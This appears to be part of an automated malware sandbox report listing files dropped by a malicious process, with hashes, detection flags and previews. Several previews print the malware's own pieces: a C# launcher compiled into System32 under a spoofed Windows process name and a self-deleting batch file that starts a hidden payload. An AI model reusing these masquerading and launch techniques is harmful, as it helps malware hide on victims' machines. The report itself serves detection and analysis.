                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.0.cs

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):372
                                                                                                                                Entropy (8bit):4.892148547519402
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L29J1niFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLK9
                                                                                                                                MD5:C516B2892E6B9D4B8B7CF14705D6743E
                                                                                                                                SHA1:554385F29DDF9E9E3F5F59153335C4EAEAD9D072
                                                                                                                                SHA-256:AA3B71B0C5D8AEFCD1ECAC812E1058B424F7DFE7A56A3056AE3AD1BFFE495625
                                                                                                                                SHA-512:74A6A0193149A9C9C7F6E161E16A99CA40F5DACCFD6F3C38C4D90F9EA0A29E026E1A1B8F08AC336DA23EC3BD3D8258867B20454806925A94F063E8FEABD19516
                                                                                                                                Malicious:false
                                                                                                                                Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\SearchApp.exe"); } catch { } }).Start();. }.}.

                                                                                                                                C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):250
                                                                                                                                Entropy (8bit):5.1256856219400415
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fhX:Hu7L//TRq79cQWf5X
                                                                                                                                MD5:D750BD650EEAAF143F400DE22F53B4C3
                                                                                                                                SHA1:07F4BC1A609BA496002FEB2E20C8A8306838A385
                                                                                                                                SHA-256:CDE84FF30BB7ADCA909971C0B7BA5050D9D32C92750FD6B6EA78224932E25CEA
                                                                                                                                SHA-512:32B9139E627126B6530C13C082ABE630BCA39447FAE192D9FF02A9F20F7E77C27AE59C3473593558F9F82257BD02AF90FEEA3FB428008B340445CEA5B6ED3457
                                                                                                                                Malicious:true
                                                                                                                                Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.0.cs"

                                                                                                                                C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.out

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (334), with CRLF, CR line terminators
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):755
                                                                                                                                Entropy (8bit):5.2555725821957955
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:zI/u7L//TRq79cQWf5eKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zI/un/Vq79tWfcKax5DqBVKVrdFAMBJj
                                                                                                                                MD5:FE10E61D09400533E0B2A01945816ADA
                                                                                                                                SHA1:FCE28C32A3F4687928FA57E60F440F5BBF8EFDB8
                                                                                                                                SHA-256:1B34610D33FB6AA8C6069FB0BEE71D585728042E756EFAF279A2CEECEB0362E1
                                                                                                                                SHA-512:73E2C3458310DE5F2509ABCCD7A293BAA65B77AFDF530B8F4FFE706E777AEC6E881E50DE3968FB62AF2C43C42850BBC52802D689F43EAE40D4C83920831C5974
                                                                                                                                Malicious:false
                                                                                                                                Preview:.C:\bridgemssurrogateintonet> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                C:\Users\user\AppData\Local\Temp\85gJ790riI

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\8BtMZuztt7

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):49152
                                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\9SSQeoWvjW

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\G86x5rHAA5

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25
                                                                                                                                Entropy (8bit):4.323856189774723
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:yU/iUfyT7n:BUn
                                                                                                                                MD5:FDB4FDE518EB6B06439C947C0D83CA8E
                                                                                                                                SHA1:978FAE1416CA531A13E4FDFE6577A596C7AD42BE
                                                                                                                                SHA-256:E1C3D9BC15AA22D5A58F3262D63EB58EF1F82703210DF23BC29046F4CF5EF0B9
                                                                                                                                SHA-512:6E9CAD25A449A71BDAE032DAD33068D5F298CA337498367CEC6FAF415AFF3363A79882418EEE0475ADCB146F22F29F0EC924D4AEA2F0CB883F17DF6FC8F58615
                                                                                                                                Malicious:false
                                                                                                                                Preview:JO7a2hwuzkZGqnhbCuPbjW6YO

                                                                                                                                C:\Users\user\AppData\Local\Temp\Hy21lrSobx

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\LiUvahcWKc

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\RES26F0.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Wed Jan 1 22:46:38 2025, 1st section name ".debug$S"
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1956
                                                                                                                                Entropy (8bit):4.5499946953412715
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:H2O9GXOA6DfHHwKBEN8luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:PAAwK+KluOulajfqXSfbNtmh1Z
                                                                                                                                MD5:E667F544C3CC6F7CFB664C7EEE14FB16
                                                                                                                                SHA1:17EDFD9584AD1AA7F4469A6CAABD6EF64E7F3BE7
                                                                                                                                SHA-256:172ECEB8D7871EE49D7E7C70643462EF5C92F4F94AC89CD7DADB21365E7F54A6
                                                                                                                                SHA-512:2B809F7256BA65C782D657DDBEA60FB8E8D8EEC752F71C228F43101AA6D385915596A41EB109DD5FADFB9C9737316742740651C28B9D2E9F915C77E07ED4A118
                                                                                                                                Malicious:false
                                                                                                                                Preview:L.....ug.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........<....c:\Windows\System32\CSCFCD79A4B9D0A479191609B82C626EB1.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES26F0.tmp.-.<....................a..Microsoft (R) CVTRES.c.=..cwd.C:\bridgemssurrogateintonet.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

                                                                                                                                C:\Users\user\AppData\Local\Temp\YYgq7hZG4g

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):98304
                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\dHledF8YIv

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):114688
                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\hx8SN2QXkl

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25
                                                                                                                                Entropy (8bit):4.163856189774724
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:eXtsh84tDn:6cx
                                                                                                                                MD5:6A8857405E84ED5AF21E76D894C1F3C4
                                                                                                                                SHA1:A159206C1C6AA8C2F27B608E66B0B6BDFAD82D45
                                                                                                                                SHA-256:B8075363C6508FF17CC1E96920A927A14772F5111900DF0D53945AE9AC1D7431
                                                                                                                                SHA-512:715415194566126730F85EDA8FC009967E6D75D09CCCC0F683ACDD1D1D3002DAF7D6868AB0E59F2DA694443DBFE687DBB9327AC76DEF9AA52269B37E0C1AD047
                                                                                                                                Malicious:false
                                                                                                                                Preview:YKsNfCNM0su4C56ZADYwnAeFf

                                                                                                                                C:\Users\user\AppData\Local\Temp\wG444MfsFD

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):114688
                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\x5Q8jyiXXr

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\xNnAMDzXoE.bat

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):230
                                                                                                                                Entropy (8bit):5.362147102147485
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:hCijTg3Nou1SV+DEz9z7yfEYKOZG1wkn23fffpHK:HTg9uYDEz0fEyf3fpK
                                                                                                                                MD5:A6C82B324FE58FEA60CEC1C5A87DFE7D
                                                                                                                                SHA1:B9452C3B1D5C72130C8582CA1063C9326E3629C1
                                                                                                                                SHA-256:96D01C62185F169D367D3EF0ACA20C17BB73CCCD596FCF0BBB1A4467CFA9F0CF
                                                                                                                                SHA-512:4A51583F16EEAC027801A5FD21F1020662A01F0F97E8ADA7F2253D0C2DE977CDBADB96428A73BBF204AEBEABF11ED693BEB052E2AE35F24DFF91E0F995C583F9
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\xNnAMDzXoE.bat"

                                                                                                                                C:\Users\user\AppData\Local\Temp\zNcK9LOhV2

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\zd89GyUYUu

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):28672
                                                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\Desktop\AjJOuhvp.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):69632
                                                                                                                                Entropy (8bit):5.932541123129161
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                Joe Sandbox View:
                                                                                                                                • Filename: eP6sjvTqJa.exe, Detection: malicious, Browse
                                                                                                                                • Filename: 1znAXdPcM5.exe, Detection: malicious, Browse
                                                                                                                                • Filename: YGk3y6Tdix.exe, Detection: malicious, Browse
                                                                                                                                • Filename: U1jaLbTw1f.exe, Detection: malicious, Browse
                                                                                                                                • Filename: voed9G7p5s.exe, Detection: malicious, Browse
                                                                                                                                • Filename: Etqq32Yuw4.exe, Detection: malicious, Browse
                                                                                                                                • Filename: KzLetzDiM8.exe, Detection: malicious, Browse
                                                                                                                                • Filename: f3I38kv.exe, Detection: malicious, Browse
                                                                                                                                • Filename: aimware.exe, Detection: malicious, Browse
                                                                                                                                • Filename: ZZ2sTsJFrt.exe, Detection: malicious, Browse
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                                C:\Users\user\Desktop\BJIWYGBF.log

                                                                                                                                Download File
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
